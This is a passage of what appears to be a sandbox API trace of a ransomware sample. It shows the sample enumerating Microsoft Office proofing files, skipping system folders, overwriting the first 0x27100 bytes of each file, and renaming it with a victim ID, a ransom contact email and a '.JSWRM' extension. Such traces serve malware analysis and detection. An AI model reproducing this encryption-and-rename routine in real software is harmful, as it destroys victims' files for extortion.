cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0139.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0139.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0139.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0139.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.642] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8fr.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8fr.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8fr.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8fr.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0139.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0139.644] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb0d2731, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb0d2731, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb1dd7cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7740a0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSGR8FR.LEX", cAlternateFileName="")) returned 1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2=".") returned 1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="..") returned 1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="...") returned 1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="windows") returned -1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="recovery") returned -1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="perflogs") returned -1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="documents and settings") returned 1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="system volume information") returned -1 [0139.644] lstrcmpiW (lpString1="MSGR8FR.LEX", lpString2="msocache") returned -1 [0139.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0139.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0139.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0139.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0139.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0139.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.645] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7815328) returned 1 [0139.645] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.645] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.659] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.659] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.660] CloseHandle (hObject=0x238) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0139.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.660] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8fr.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8FR.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8fr.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0139.661] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd68243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd8e49f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x266d0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSHY7EN.DLL", cAlternateFileName="")) returned 1 [0139.661] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2=".") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="..") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="...") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="windows") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="recovery") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="perflogs") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="documents and settings") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="system volume information") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.DLL", lpString2="msocache") returned -1 [0139.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0139.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7EN.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0139.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0139.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7EN.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0139.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0139.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0139.662] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb1dd7cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x74400, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSHY7EN.LEX", cAlternateFileName="")) returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2=".") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="..") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="...") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="windows") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="recovery") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="perflogs") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="documents and settings") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="system volume information") returned -1 [0139.662] lstrcmpiW (lpString1="MSHY7EN.LEX", lpString2="msocache") returned -1 [0139.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0139.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7EN.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0139.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0139.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0139.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0139.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.664] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=476160) returned 1 [0139.664] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.664] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.677] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.677] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.677] CloseHandle (hObject=0x238) returned 1 [0139.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0139.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0139.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0139.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0139.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0139.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7en.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSHY7EN.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mshy7en.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0139.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0139.682] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b5bbeb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b5bbeb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b5bbeb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26c68, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSHY7ES.DLL", cAlternateFileName="")) returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2=".") returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="..") returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="...") returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="windows") returned -1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="recovery") returned -1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="perflogs") returned -1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="documents and settings") returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="system volume information") returned -1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.DLL", lpString2="msocache") returned -1 [0139.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0139.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7ES.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0139.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSHY7ES.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSHY7ES.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0139.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0139.682] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e0a643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb1dd7cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23a00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSHY7ES.LEX", cAlternateFileName="")) returned 1 [0139.682] lstrcmpiW (lpString1="MSHY7ES.LEX", lpString2=".") 